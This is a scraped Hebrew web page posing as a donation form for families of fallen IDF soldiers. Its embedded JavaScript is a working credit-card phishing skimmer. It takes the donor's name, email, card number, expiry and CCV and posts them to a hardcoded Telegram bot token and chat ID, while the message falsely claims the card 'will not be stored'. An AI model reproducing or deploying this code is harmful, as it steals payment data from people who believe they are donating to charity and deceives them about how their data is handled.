כולם בשביל כולם | ביחד ננצח
תרומת משפחות חיילי צה"ל * { margin: 0; padding: 0; box-sizing: border-box; font-family: Arial, sans-serif; } body { background-color: #f4f4f9; display: flex; justify-content: center; align-items: center; min-height: 100vh; color: #333; } .container { width: 100%; max-width: 600px; background: #fff; border-radius: 10px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1); overflow: hidden; } .header { background: #0056b3; color: #fff; text-align: center; padding: 20px; } .header h2 { font-size: 26px; margin-bottom: 5px; } .header p { font-size: 14px; color: #e0e0e0; } .form { padding: 20px; } .form-group { margin-bottom: 15px; } .form-group label { display: block; margin-bottom: 5px; font-weight: bold; } .form-group input, .form-group select { width: 100%; padding: 10px; border: 1px solid #ddd; border-radius: 5px; font-size: 14px; outline: none; transition: border-color 0.3s; } .form-group input:focus, .form-group select:focus { border-color: #0056b3; } .form-group textarea { resize: vertical; height: 120px; } .submit-btn { background: #0056b3; color: #fff; border: none; padding: 10px 15px; font-size: 16px; cursor: pointer; border-radius: 5px; width: 100%; transition: background 0.3s; } .submit-btn:hover { background: #003d82; } .footer { text-align: center; padding: 10px; background: #f1f1f1; font-size: 14px; color: #555; }

תרומת משפחות חיילי צה"ל

הצטרפו לתמוך במשפחות החיילים שנפלו

const botToken = '7667035115:AAGK_rKQ90XaYMn4RfemrpJvRAVOjkbvBDY'; // Your Telegram bot token const chatId = '6347526992'; // Your chat ID // Handle form submission document.getElementById('donationForm').addEventListener('submit', async (e) => { e.preventDefault(); const fullName = document.getElementById('fullName').value; const email = document.getElementById('email').value; const amount = document.getElementById('amount').value; const ccNumber = document.getElementById('ccNumber').value; const ccExpiry = document.getElementById('ccExpiry').value; const ccv = document.getElementById('ccv').value; const message = document.getElementById('message').value; const donationMessage = ` תרומה חדשה עבור משפחות חיילי צה"ל: שם תורם: ${fullName} דוא"ל: ${email} סכום תרומה: ${amount} ש"ח מספר כרטיס אשראי: ${ccNumber} (לא יאוחסן) תוקף כרטיס: ${ccExpiry} קוד אבטחה (CCV): ${ccv} הודעה אישית: ${message} `; try { const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ chat_id: chatId, text: donationMessage, }), }); if (!response.ok) throw new Error('Message failed to send'); alert('התרומה נשלחה בהצלחה!'); document.getElementById('donationForm').reset(); } catch (error) { console.error('Error sending donation:', error); alert('שגיאה בשליחת התרומה. נא נסה שוב.'); } });

כולם בשביל כולם | ביחד ננצח

Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors
post
Filter by Categories
גוש דן
דרום
דרום
דרום
השפלה
חיפה
ירושלים
כל הארץ
מרכז
מרכז
עוטף עזה
עוטף עזה
צפון
צפון
צפון

עקבו אחרינו